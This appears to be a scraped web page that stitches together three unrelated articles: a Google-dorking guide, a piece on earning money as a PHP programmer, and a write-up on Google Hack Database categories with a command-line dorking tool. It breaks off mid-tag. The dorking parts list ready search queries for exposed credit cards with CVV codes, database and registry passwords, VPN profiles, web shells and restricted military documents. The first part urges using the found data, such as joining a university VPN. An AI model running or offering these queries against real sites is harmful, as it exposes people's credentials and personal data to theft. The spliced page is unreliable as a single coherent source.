Inurl php http what earnings. How to make money by knowing PHP? How can a php programmer make good money at home?

Obtaining private data does not always mean hacking - sometimes it is published publicly. Knowledge of Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

WARNING

All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Today, everything is connected to the Internet, with little concern for restricting access. Therefore, many private data become the prey of search engines. Spider robots are no longer limited to web pages, but index all content available on the Internet and constantly add non-public information to their databases. Finding out these secrets is easy - you just need to know how to ask about them.

Looking for files

In capable hands, Google will quickly find everything that is not found on the Internet, for example, personal information and files for official use. They are often hidden like a key under a rug: there are no real access restrictions, the data simply lies on the back of the site, where no links lead. The standard Google web interface provides only basic advanced search settings, but even these will be sufficient.

You can limit your Google search to a specific type of file using two operators: filetype and ext . The first specifies the format that the search engine determined from the file title, the second specifies the file extension, regardless of its internal content. When searching in both cases, you only need to specify the extension. Initially, the ext operator was convenient to use in cases where the file did not have specific format characteristics (for example, to search for ini and cfg configuration files, which could contain anything). Now Google's algorithms have changed, and there is no visible difference between operators - in most cases the results are the same.


Filtering the results

By default, Google searches for words and, in general, any entered characters in all files on indexed pages. You can limit the search area by top-level domain, a specific site, or by the location of the search sequence in the files themselves. For the first two options, use the site operator, followed by the name of the domain or selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the given one in the body of the links themselves, allinanchor - in the text equipped with the tag , allintitle - in page titles, allintext - in the body of pages.

For each operator there is a lightweight version with a shorter name (without the prefix all). The difference is that allinurl will find links with all words, and inurl will only find links with the first of them. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another operator with a similar meaning - site. The first also allows you to find any sequence of characters in a link to the searched document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. We take the allintext filter and make the request produce a list of numbers and verification codes of credit cards that will expire only in two years (or when their owners get tired of feeding everyone).

Allintext: card number expiration date /2017 cvv

When you read in the news that a young hacker “hacked into the servers” of the Pentagon or NASA, stealing classified information, in most cases we are talking about just such a basic technique of using Google. Suppose we are interested in a list of NASA employees and their contact information. Surely such a list is available in electronic form. For convenience or due to oversight, it may also be on the organization’s website itself. It is logical that in this case there will be no links to it, since it is intended for internal use. What words can be in such a file? At a minimum - the “address” field. Testing all these assumptions is easy.


Inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Finds like this are a nice touch. A truly solid catch is provided by a more detailed knowledge of Google's operators for webmasters, the Network itself, and the peculiarities of the structure of what is being sought. Knowing the details, you can easily filter the results and refine the properties of the necessary files in order to get truly valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces standard formulations that are convenient for searching for secret information accidentally leaked onto the Internet.

For example, the Distribution statement stamp, required by the US Department of Defense, means standardized restrictions on the distribution of a document. The letter A denotes public releases in which there is nothing secret; B - intended only for internal use, C - strictly confidential, and so on until F. The letter X stands out separately, which marks particularly valuable information representing a state secret of the highest level. Let those who are supposed to do this on duty search for such documents, and we will limit ourselves to files with the letter C. According to DoDI directive 5230.24, this marking is assigned to documents containing a description of critical technologies that fall under export control. You can find such carefully protected information on sites in the top-level domain.mil, allocated for the US Army.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that the .mil domain contains only sites from the US Department of Defense and its contract organizations. Search results with a domain restriction are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets in this way is practically useless: chaos reigns in domains.ru and.rf, and the names of many weapons systems sound like botanical ones (PP “Kiparis”, self-propelled guns “Akatsia”) or even fabulous (TOS “Buratino”).


By carefully studying any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions “Sec 2751”, which is also convenient for searching for interesting technical information. From time to time it is removed from official sites where it once appeared, so if you cannot follow an interesting link in the search results, use Google’s cache (cache operator) or the Internet Archive site.

Climbing into the clouds

In addition to accidentally declassified government documents, links to personal files from Dropbox and other data storage services that create “private” links to publicly published data occasionally pop up in Google's cache. It’s even worse with alternative and homemade services. For example, the following query finds data for all Verizon customers who have an FTP server installed and actively using their router.

Allinurl:ftp:// verizon.net

There are now more than forty thousand such smart people, and in the spring of 2015 there were many more of them. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external storage device connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file downloading. All contents of such media are indexed by Google and other search engines, so you can access files stored on external drives via a direct link.

Looking at the configs

Before the widespread migration to the cloud, simple FTP servers ruled as remote storage, which also had a lot of vulnerabilities. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts and passwords in the ws_ftp.ini file. It is easy to find and read, since all records are saved in text format, and passwords are encrypted with the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

It is easy to decrypt such passwords using the WS_FTP Password Decryptor utility or a free web service.

When talking about hacking an arbitrary website, they usually mean obtaining a password from logs and backups of configuration files of CMS or e-commerce applications. If you know their typical structure, you can easily indicate the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, in Drupal and PrestaShop there is always a user identifier (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them as follows:

"pwd=" "UID=" ext:inc

Revealing DBMS passwords

In the configuration files of SQL servers, user names and email addresses are stored in clear text, and their MD5 hashes are written instead of passwords. Strictly speaking, it is impossible to decrypt them, but you can find a match among the known hash-password pairs.

There are still DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.

Intext:DB_PASSWORD filetype:env

With the advent of Windows servers, the place of configuration files was partially taken by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

Filetype:reg HKEY_CURRENT_USER "Password"=

Let's not forget the obvious

Sometimes it is possible to get to classified information using data that was accidentally opened and came to the attention of Google. The ideal option is to find a list of passwords in some common format. Only desperate people can store account information in a text file, Word document or Excel spreadsheet, but there is always enough of them.

Filetype:xls inurl:password

On the one hand, there are a lot of means to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch the CMS, not use left-handed scripts and close other holes. There is also a file with a list of robots.txt exceptions that prohibits search engines from indexing the files and directories specified in it. On the other hand, if the structure of robots.txt on some server differs from the standard one, then it immediately becomes clear what they are trying to hide on it.

The list of directories and files on any site is preceded by the standard index of. Since for service purposes it must appear in the title, it makes sense to limit its search to the intitle operator. Interesting things are in the /admin/, /personal/, /etc/ and even /secret/ directories.

Stay tuned for updates

Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between a “last second” filter (&tbs=qdr:s at the end of the request URL) and a “real time” filter (&tbs=qdr:1).

The time interval of the date of the last update of the file is also indicated implicitly by Google. Through the graphical web interface, you can select one of the standard periods (hour, day, week, etc.) or set a date range, but this method is not suitable for automation.

From the look of the address bar, you can only guess about a way to limit the output of results using the &tbs=qdr: construction. The letter y after it sets the limit of one year (&tbs=qdr:y), m shows the results for the last month, w - for the week, d - for the past day, h - for the last hour, n - for the minute, and s - for give me a sec. The most recent results that Google has just made known are found using the filter &tbs=qdr:1 .

If you need to write a clever script, it will be useful to know that the date range is set in Google in Julian format using the daterange operator. For example, this is how you can find a list of PDF documents with the word confidential, downloaded from January 1 to July 1, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is indicated in Julian date format without taking into account the fractional part. Translating them manually from the Gregorian calendar is inconvenient. It's easier to use a date converter.

Targeting and filtering again

In addition to specifying additional operators in the search query, they can be sent directly in the body of the link. For example, the filetype:pdf specification corresponds to the construction as_filetype=pdf . This makes it convenient to ask any clarifications. Let's say that the output of results only from the Republic of Honduras is specified by adding the construction cr=countryHN to the search URL, and only from the city of Bobruisk - gcs=Bobruisk. You can find a complete list in the developer section.

Google's automation tools are designed to make life easier, but they often add problems. For example, the user’s city is determined by the user’s IP through WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same request, different results will appear on the first page, and some of them may be completely hidden. The two-letter code after the gl=country directive will help you feel like a cosmopolitan and search for information from any country. For example, the code of the Netherlands is NL, but the Vatican and North Korea do not have their own code in Google.

Often, search results end up cluttered even after using several advanced filters. In this case, it is easy to clarify the request by adding several exception words to it (a minus sign is placed in front of each of them). For example, banking, names and tutorial are often used with the word Personal. Therefore, cleaner search results will be shown not by a textbook example of a query, but by a refined one:

Intitle:"Index of /Personal/" -names -tutorial -banking

One last example

A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, VPN is a convenient thing, but either expensive, or temporary and with restrictions. Signing up for a subscription for yourself is too expensive. It's good that there are group subscriptions, and with the help of Google it's easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One request and you join, for example, the friendly team of the University of Bonn.

Filetype:pcf vpn OR Group

INFO

Google finds password configuration files, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service.

Passwords are stored encrypted, but Maurice Massard has already written a program to decrypt them and provides it for free through thecampusgeeks.com.

Google runs hundreds of different types of attacks and penetration tests. There are many options, affecting popular programs, major database formats, numerous vulnerabilities of PHP, clouds, and so on. Knowing exactly what you're looking for will make it much easier to find the information you need (especially information you didn't intend to make public). Shodan is not the only one that feeds with interesting ideas, but every database of indexed network resources!

From the author: Hello friends! In this article we will talk about the PHP programming language. Let's find out what it is used for, what you can do with it, and what place it occupies in the stages of website development. Also in this article we will look at many ways to make money knowing how to program in PHP.

What is PHP and what is it for?

PHP is a scripting language that is very actively used in the development of web applications. PHP is one of the leading languages ​​used in developing dynamic websites.

PHP is a server-side programming language. All scripts written in this language are executed on the server with the site. To study PHP, develop and debug websites and scripts, of course, you don’t have to buy a real server on the Internet. For these purposes, server emulators are used, which in the form of programs are simply installed on a working computer. And on a server on the Internet (hosting) ready-made websites and pages with PHP scripts are placed. By the way, almost all modern hosting supports the PHP language.

The popularity of this language in the field of website building is determined by the presence of a large set of built-in tools for developing web applications. The main ones:

automatic extraction of POST and GET parameters, as well as web server environment variables into predefined arrays;

interaction with a large number of different database management systems (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape and Apache Derby, Informix, Ovrimos SQL, Lotus Notes , DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird / InterBase, Paradox File Access, MaxDB, PDO Interface);

automated sending of HTTP headers;

working with cookies and sessions;

working with local and remote files, sockets;

processing files uploaded to the server;

working with XForms.

Let's look at an example where the PHP script runs on the page. Take, for example, the subscription form in which you enter your name and email on many sites. HTML and CSS are responsible for the appearance of the form - the colors of the input fields and buttons, changing the color of the button when hovering and clicking on it, and so on. Using HTML5, you can check the correctness of the data entered into the form - for example, whether the email or phone fields are filled out correctly.

And after you click the “Subscribe” button, a PHP script is called, which receives the data you entered into the form. The script records them in the database, generates and sends you a link to confirm your subscription to the email specified in the form, checks the subscription confirmation and sends you subsequent emails. All these operations are performed on the server, and this is done using the PHP programming language.

Application of PHP in website development

To create a website, you need to go through several stages:

Planning. At this stage, we are planning the future site: for whom and why are we making it, who will visit the site, what to fill it with, what should be on the site, and so on.

Design. At the design stage, we create the appearance of the site pages in a graphic editor.

Layout. At the layout stage, using HTML and CSS, we create the HTML pages of the future site from the layouts obtained at the design stage.

Programming. At the programming stage, we automate the processes of working with the site. We program the administrative part of the site (admin panel) so that you can add, delete, edit existing pages even for a person completely unfamiliar with website building. We program so that the search and all subscription forms (if any) on the site work. We make sure that the newly added page is displayed on the site, and a link to the created page automatically appears in the menu. If the site uses voting or a survey, then this is also all programmed in PHP, at the programming stage.

If we consider the stage of programming a larger site, for example, an online store, then everything here is even wider and more interesting. In this case, we add not only pages, but also products - the main content of the online store. Moreover, in the admin panel you need to provide a breakdown of added products into various categories. It should also be possible to edit the product, change its description, price, picture, etc.

In addition, an online store requires programming of an analytics system - so that you can see in the admin panel how many orders were placed and paid, for what amount, and which products were paid for from which categories, etc. Moreover, it should be possible to display such reports for various periods. When programming an online store, sales reporting for accounting and tax purposes is often also implemented.

That is why the stage in which the PHP programming language is used is the most important, the longest in terms of time, and the most expensive and highly paid in website development. And once you understand how to program an online store, you will be able to create scripts for a website of almost any complexity.

Popularity of PHP

The popularity of PHP is evidenced by the fact that it is used by 83.1% of all sites where it was possible to identify a server-side programming language.

All the most popular CMSs that occupy first places in popularity ratings (both paid and free: WordPress, Joomla, Drupal, Modx, Bitrix. Magento, etc.) are written in the PHP programming language.

Also, the popularity of the PHP programming language is evidenced by the many created PHP frameworks, such as Laravel, Yii, CakePHP, Slim, Zend Framework 2, PHPixie, CodeIgniter, Symfony 2 and others. There are a huge number of forums and large communities - for PHP in general, for each framework and for each CMS separately.
I’ll also add that the world’s largest sites, for example, Facebook, Wikipedia, are also written in PHP.

How can you make money with knowledge of PHP?

Given the popularity of PHP, there is a constant high demand for PHP programmers. Having knowledge of PHP and being able to program in this language will open up new opportunities for earning money. Let's look at the main ones with which you can really make money today:

Earning money by developing scripts. All sites are constantly evolving, and they periodically require the writing of new scripts, or the development of additional functionality, modules, etc. For such developments, site owners turn to PHP developers. Moreover, in this case you can earn money in two ways:

track orders to find a freelance developer;

generate ideas for mass scripts. Having an idea for a script that will definitely be in demand among, for example, owners of online stores, you can independently develop such a script and sell it to online store owners;

Finalization of ready-made scripts “to order”. Everything is simple here - you take on the modification or correction of a script. But in this case, there is a nuance - initially the script may not be made very well, and its refinement may take more time than writing a script from scratch. Therefore, if you use this method of earning money, initially look very carefully at what you will be modifying and completing.

Development of plugins for CMS. In this method, everything is the same as when making money from scripts. Often, websites created on ready-made CMS require writing some kind of plugin, add-on or extension. And you can earn money here in two ways:

track orders for the development of plugins, add-ons and extensions on a freelance basis;

develop and sell a mass plugin that will definitely be in demand on most sites;

Own and joint projects. If you have an idea for an Internet project (startup), for example, an idea for a useful service or application that would solve a specific problem, then you can start implementing it. At the initial stage, it can even be just as a hobby, in addition to your main job. Then, when it is clear that the hobby is growing into a big project, it will be possible to devote more time to it.

Creation of dynamic websites and engines for them. You can also make good money by developing custom websites, working as a freelancer or in a web studio.

Creating websites for yourself. You can create a website for yourself, fill it with useful content - and when the site has a sufficient number of visitors, start making money by placing paid advertising on it or promoting someone’s products through affiliate programs.

I think many of you have thought that all of the above methods of earning money can be combined. And it is right! You can create a website for yourself and passively earn money by selling advertising from it, plus create a script or plugin and sell it on specialized sites, earning money on autopilot from each sale, and at the same time you can still work in a web studio. Why not? Of course you can!

How much can a PHP developer earn?

With the earnings of PHP programmers, everything is individual. A lot here depends on where to work, how to work, what level of knowledge, what experience, qualifications, what related additional knowledge the developer has, and so on. Therefore, in principle, there cannot be any exact figure here. But we can look at what salaries are offered when searching for PHP programmers in a web studio, and how much they are willing to pay for a project on freelance exchanges.

The image below shows the proposed salary for PHP programmers in a web studio. Moreover, this is the salary for PHP programmers without work experience:

If you have work experience, you can earn much more. Below are the salaries offered to experienced PHP programmers.

And today you can also earn decent money from freelancing:

Conclusion

PHP is the most popular programming language among web developers. The vast majority of all websites on the Internet are written in PHP. Having the knowledge and ability to develop in this programming language, you can earn good money, and there are many options for earning money - from working in a web studio to developing your own project or startup.

Any search for vulnerabilities on web resources begins with reconnaissance and information collection.
Intelligence can be either active - brute force of files and directories of the site, running vulnerability scanners, manually browsing the site, or passive - searching for information in different search engines. Sometimes it happens that a vulnerability becomes known even before opening the first page of the site.

How is this possible?
Search robots, constantly roaming the Internet, in addition to information useful to the average user, often record things that can be used by attackers to attack a web resource. For example, script errors and files with sensitive information (from configuration files and logs to files with authentication data and database backups).
From the point of view of a search robot, an error message about executing an sql query is plain text, inseparable, for example, from the description of products on the page. If suddenly a search robot came across a file with the .sql extension, which for some reason ended up in the site’s working folder, then it will be perceived as part of the site’s content and will also be indexed (including, possibly, the passwords specified in it).

Such information can be found by knowing strong, often unique, keywords that help separate “vulnerable pages” from pages that do not contain vulnerabilities.
A huge database of special queries using keywords (so-called dorks) exists on exploit-db.com and is known as the Google Hack Database.

Why google?
Dorks are primarily targeted at Google for two reasons:
− the most flexible syntax of keywords (shown in Table 1) and special characters (shown in Table 2);
− the Google index is still more complete than that of other search engines;

Table 1 - Main Google keywords

Keyword
Meaning
Example
site
Search only on the specified site. Only takes into account url
site:somesite.ru - will find all pages on a given domain and subdomains
inurl
Search by words present in the uri. Unlike cl. words “site”, searches for matches after the site name
inurl:news - finds all pages where the given word appears in the uri
intext
Search in the body of the page
intext:”traffic jams” - completely similar to the usual request for “traffic jams”
intitle
Search in the page title. Text between tags <br></td> <td width="214">intitle:”index of” - will find all pages with directory listings <br></td> </tr><tr><td width="214">ext <br></td> <td width="214">Search for pages with a specified extension <br></td> <td width="214">ext:pdf - finds all pdf files <br></td> </tr><tr><td width="214">filetype <br></td> <td width="214">Currently, completely similar to class. the word “ext” <br></td> <td width="214">filetype:pdf - similar <br></td> </tr><tr><td width="214">related <br></td> <td width="214">Search for sites with similar topics <br></td> <td width="214">related:google.ru - will show its analogues <br></td> </tr><tr><td width="214">link <br></td> <td width="214">Search for sites linking to this <br></td> <td width="214">link:somesite.ru - will find all sites that have a link to this <br></td> </tr><tr><td width="214">define <br></td> <td width="214">Show word definition <br></td> <td width="214">define:0day - definition of the term <br></td> </tr><tr><td width="214">cache <br></td> <td width="214">Show page contents in cache (if present) <br></td> <td width="214">cache:google.com - will open a cached page <br></td> </tr></tbody></table><p>Table 2 - Special characters for Google queries <br></p><table><tbody><tr><td width="214"><b>Symbol</b><br></td> <td width="214"><b>Meaning</b><br></td> <td width="214"><b>Example</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Exact phrase <br></td> <td width="214">intitle:“RouterOS router configuration page” - search for routers <br></td> </tr><tr><td width="214">*<br></td> <td width="214">Any text <br></td> <td width="214">inurl: “bitrix*mcart” - search for sites on bitrix with a vulnerable mcart module <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Any character <br></td> <td width="214">Index.of - similar to the index of request <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Delete a word <br></td> <td width="214">error -warning - show all pages that have an error but no warning <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Range <br></td> <td width="214">cve 2006..2016 - show vulnerabilities by year starting from 2006 <br></td> </tr><tr><td width="214">|<br></td> <td width="214">Logical "or" <br></td> <td width="214">linux | windows - show pages where either the first or second word occurs <br></td> </tr></tbody></table><br>It is worth understanding that any request to a search engine is a search only by words. <br>It is useless to look for meta-characters on the page (quotes, parentheses, punctuation marks, etc.). Even a search for the exact phrase specified in quotation marks is a word search, followed by a search for an exact match in the results. <p>All Google Hack Database dorks are logically divided into 14 categories and are presented in Table 3. <br>Table 3 – Google Hack Database Categories <br></p><table><tbody><tr><td width="168"><b>Category</b><br></td> <td width="190"><b>What allows you to find</b><br></td> <td width="284"><b>Example</b><br></td> </tr><tr><td width="168">Footholds <br></td> <td width="190">Web shells, public file managers <br></td> <td width="284">Find all hacked sites where the listed webshells are uploaded: <br>(intitle:"phpshell" OR intitle:"c99shell" OR intitle:"r57shell" OR intitle:"PHP Shell" OR intitle:"phpRemoteView") `rwx` "uname" <br></td> </tr><tr><td width="168">Files containing usernames <br></td> <td width="190">Registry files, configuration files, logs, files containing the history of entered commands <br></td> <td width="284">Find all registry files containing account information: <br><i>filetype:reg reg +intext:“internet account manager”</i><br></td> </tr><tr><td width="168">Sensitive Directories <br></td> <td width="190">Directories with various information (personal documents, vpn configs, hidden repositories, etc.) <br></td> <td width="284">Find all directory listings containing VPN-related files: <br><i>"Config" intitle:"Index of" intext:vpn</i><br>Sites containing git repositories: <br><i>(intext:"index of /.git") ("parent directory")</i><br></td> </tr><tr><td width="168">Web Server Detection <br></td> <td width="190">Version and other information about the web server <br></td> <td width="284">Find JBoss server administrative consoles: <br><i>inurl:"/web-console/" intitle:"Administration Console"</i><br></td> </tr><tr><td width="168">Vulnerable Files <br></td> <td width="190">Scripts containing known vulnerabilities <br></td> <td width="284">Find sites that use a script that allows you to upload an arbitrary file from the server: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Vulnerable Servers <br></td> <td width="190">Installation scripts, web shells, open administrative consoles, etc. <br></td> <td width="284">Find open PHPMyAdmin consoles running as root: <br><i>intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"</i><br></td> </tr><tr><td width="168">Error Messages <br></td> <td width="190">Various errors and warnings often reveal important information - from CMS version to passwords <br></td> <td width="284">Sites that have errors in executing SQL queries to the database: <br><i>"Warning: mysql_query()" "invalid query"</i><br></td> </tr><tr><td width="168">Files containing juicy info <br></td> <td width="190">Certificates, backups, emails, logs, SQL scripts, etc. <br></td> <td width="284">Find initialization sql scripts: <br><i>filetype:sql and “insert into” -site:github.com</i><br></td> </tr><tr><td width="168">Files containing passwords <br></td> <td width="190">Anything that can contain passwords - logs, sql scripts, etc. <br></td> <td width="284">Logs mentioning passwords: <br><i>filetype:</i><i>log</i><i>intext:</i><i>password |</i><i>pass |</i><i>pw</i><br>sql scripts containing passwords: <br><i>ext:</i><i>sql</i><i>intext:</i><i>username</i><i>intext:</i><i>password</i><br></td> </tr><tr><td width="168">Sensitive Online Shopping Info <br></td> <td width="190">Information related to online purchases <br></td> <td width="284">Find pincodes: <br><i>dcid=</i><i>bn=</i><i>pin</i><i>code=</i><br></td> </tr><tr><td width="168">Network or vulnerability data <br></td> <td width="190">Information not directly related to the web resource, but affecting the network or other non-web services <br></td> <td width="284">Find automatic proxy configuration scripts containing information about the internal network: <br><i>inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Pages containing login portals <br></td> <td width="190">Pages containing login forms <br></td> <td width="284">saplogon web pages: <br><i>intext:"2016 SAP AG. All rights reserved." intitle:"Logon"</i><br></td> </tr><tr><td width="168">Various Online Devices <br></td> <td width="190">Printers, routers, monitoring systems, etc. <br></td> <td width="284">Find the printer configuration panel: <br><i>intitle:"</i><i>hp</i><i>laserjet"</i><i>inurl:</i><i>SSI/</i><i>Auth/</i><i>set_</i><i>config_</i><i>deviceinfo.</i><i>htm</i><br></td> </tr><tr><td width="168">Advisories and Vulnerabilities <br></td> <td width="190">Websites on vulnerable CMS versions <br></td> <td width="284">Find vulnerable plugins through which you can upload an arbitrary file to the server: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Dorks are more often focused on searching across all Internet sites. But nothing prevents you from limiting the search scope on any site or sites. <br>Each Google query can be focused on a specific site by adding the keyword “site:somesite.com” to the query. This keyword can be added to any dork. <p><b>Automating the search for vulnerabilities</b><br>This is how the idea was born to write a simple utility that automates the search for vulnerabilities using a search engine (google) and relies on the Google Hack Database.</p><p>The utility is a script written in nodejs using phantomjs. To be precise, the script is interpreted by phantomjs itself. <br>Phantomjs is a full-fledged web browser without a GUI, controlled by js code and with a convenient API. <br>The utility received a quite understandable name - dorks. By running it on the command line (without options), we get short help with several examples of use: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Figure 1 - List of main dorks options</p><p>The general syntax of the utility is: dork “command” “option list”. <br>A detailed description of all options is presented in Table 4.</p><p>Table 4 - Dorks syntax <br></p><table border="1"><tbody><tr><td width="214"><b>Team</b><br></td> <td width="214"><b>Option</b><br></td> <td width="214"><b>Description</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-l <br></td> <td width="214">Print a numbered list of dork categories Google Hack Database <br></td> </tr><tr><td width="214">-c “category number or name” <br></td> <td width="214">Load doors of the specified category by number or name <br></td> </tr><tr><td width="214">-q "phrase" <br></td> <td width="214">Download dorks found by request <br></td> </tr><tr><td width="214">-o "file" <br></td> <td width="214">Save the result to a file (only with -c|-q options) <br></td> </tr><tr><td rowspan="8" width="214">google <br></td> <td width="214">-d "dork" <br></td> <td width="214">Set an arbitrary dork (the option can be used many times, combination with the -D option is allowed) <br></td> </tr><tr><td width="214">-D "file" <br></td> <td width="214">Use dorks from file <br></td> </tr><tr><td width="214">-s "site" <br></td> <td width="214">Set site (option can be used many times, combination with option -S is allowed) <br></td> </tr><tr><td width="214">-S "file" <br></td> <td width="214">Use sites from a file (dorks will be searched for each site independently) <br></td> </tr><tr><td width="214">-f "filter" <br></td> <td width="214">Set additional keywords (will be added to each dork) <br></td> </tr><tr><td width="214">-t "number of ms" <br></td> <td width="214">Interval between requests to google <br></td> </tr><tr><td width="214">-T "number of ms" <br></td> <td width="214">Timeout if a captcha is encountered <br></td> </tr><tr><td width="214">-o "file" <br></td> <td width="214">Save the result to a file (only those tracks for which something was found will be saved) <br></td> </tr></tbody></table><br>Using the ghdb command, you can get all the dorks from exploit-db by arbitrary request, or specify the entire category. If you specify category 0, the entire database will be unloaded (about 4.5 thousand dorks). <p>The list of categories currently available is presented in Figure 2. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Figure 2 - List of available GHDB dork categories</p><p>The google team will substitute each dork into the google search engine and analyze the result for matches. The paths where something was found will be saved to a file. <br>The utility supports different search modes: <br>1 dork and 1 site; <br>1 dork and many sites; <br>1 site and many dorks; <br>many sites and many dorks; <br>The list of dorks and sites can be specified either through an argument or through a file.</p><p><b>Demonstration of work</b><br>Let's try to look for any vulnerabilities using the example of searching for error messages. By command: dorks ghdb –c 7 –o errors.dorks all known dorks of the “Error Messages” category will be loaded as shown in Figure 3. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Figure 3 – Loading all known dorks of the “Error Messages” category</p><p>Dorks are downloaded and saved to a file. Now all that remains is to “set” them on some site (see Figure 4). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Figure 4 – Search for vulnerabilities of the site of interest in the Google cache</p><p>After some time, several pages containing errors are discovered on the site under study (see Figure 5).</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Figure 5 – Error messages found</p><p>As a result, in the result.txt file we get a complete list of dorks that lead to the error. <br>Figure 6 shows the result of searching for site errors. <br><br>Figure 6 – Error search result</p><p>In the cache for this dork, a complete backtrace is displayed, revealing the absolute paths of the scripts, the site content management system and the database type (see Figure 7). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Figure 7 – disclosure of information about the site design</p><p>However, it is worth considering that not all dorks from GHDB give true results. Also, Google may not find an exact match and show a similar result.</p><p>In this case, it is wiser to use your personal list of dorks. For example, it is always worth looking for files with “unusual” extensions, examples of which are shown in Figure 8. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Figure 8 – List of file extensions that are not typical for a regular web resource</p><p>As a result, with the command dorks google –D extensions.txt –f bank, from the very first request Google begins to return sites with “unusual” file extensions (see Figure 9). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Figure 9 – Search for “bad” file types on banking websites</p><p>It is worth keeping in mind that Google does not accept queries longer than 32 words.</p><p>Using the command dorks google –d intext:”error|warning|notice|syntax” –f university <br>You can look for PHP interpreter errors on educational websites (see Figure 10). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Figure 10 – Finding PHP runtime errors</p><p>Sometimes it is not convenient to use one or two categories of dorks. <br>For example, if it is known that the site runs on the Wordpress engine, then we need WordPress-specific modules. In this case, it is convenient to use the Google Hack Database search. The command dorks ghdb –q wordpress –o wordpress_dorks.txt will download all dorks from Wordpress, as shown in Figure 11: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Figure 11 – Search for Dorks related to Wordpress</p><p>Let's go back to the banks again and use the command dorks google –D wordpress_dords.txt –f bank to try to find something interesting related to Wordpress (see Figure 12). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Figure 12 – Search for Wordpress vulnerabilities</p><p>It is worth noting that the search on Google Hack Database does not accept words shorter than 4 characters. For example, if the site's CMS is not known, but the language is known - PHP. In this case, you can filter what you need manually using the pipe and the system search utility dorks –c all | findstr /I php > php_dorks.txt (see Figure 13): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Figure 13 – Search all dorks where PHP is mentioned</p><p>Searching for vulnerabilities or some sensitive information in a search engine should only be done if there is a significant index on this site. For example, if a site has 10-15 pages indexed, then it’s stupid to search for anything in this way. Checking the index size is easy - just enter “site:somesite.com” into the Google search bar. An example of a site with an insufficient index is shown in Figure 14. <br><br><img 